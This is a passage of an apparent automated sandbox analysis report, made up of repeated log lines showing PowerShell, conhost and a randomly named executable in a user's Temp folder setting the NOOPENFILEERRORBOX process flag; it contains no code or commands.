                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\2AZA84BP4AM1TVWCT7DQB9ZWGJA.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\2AZA84BP4AM1TVWCT7DQB9ZWGJA.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\2AZA84BP4AM1TVWCT7DQB9ZWGJA.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\2AZA84BP4AM1TVWCT7DQB9ZWGJA.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\2AZA84BP4AM1TVWCT7DQB9ZWGJA.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\2AZA84BP4AM1TVWCT7DQB9ZWGJA.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\2AZA84BP4AM1TVWCT7DQB9ZWGJA.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\2AZA84BP4AM1TVWCT7DQB9ZWGJA.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\2AZA84BP4AM1TVWCT7DQB9ZWGJA.exeProcess information set: NOOPENFILEERRORBOX
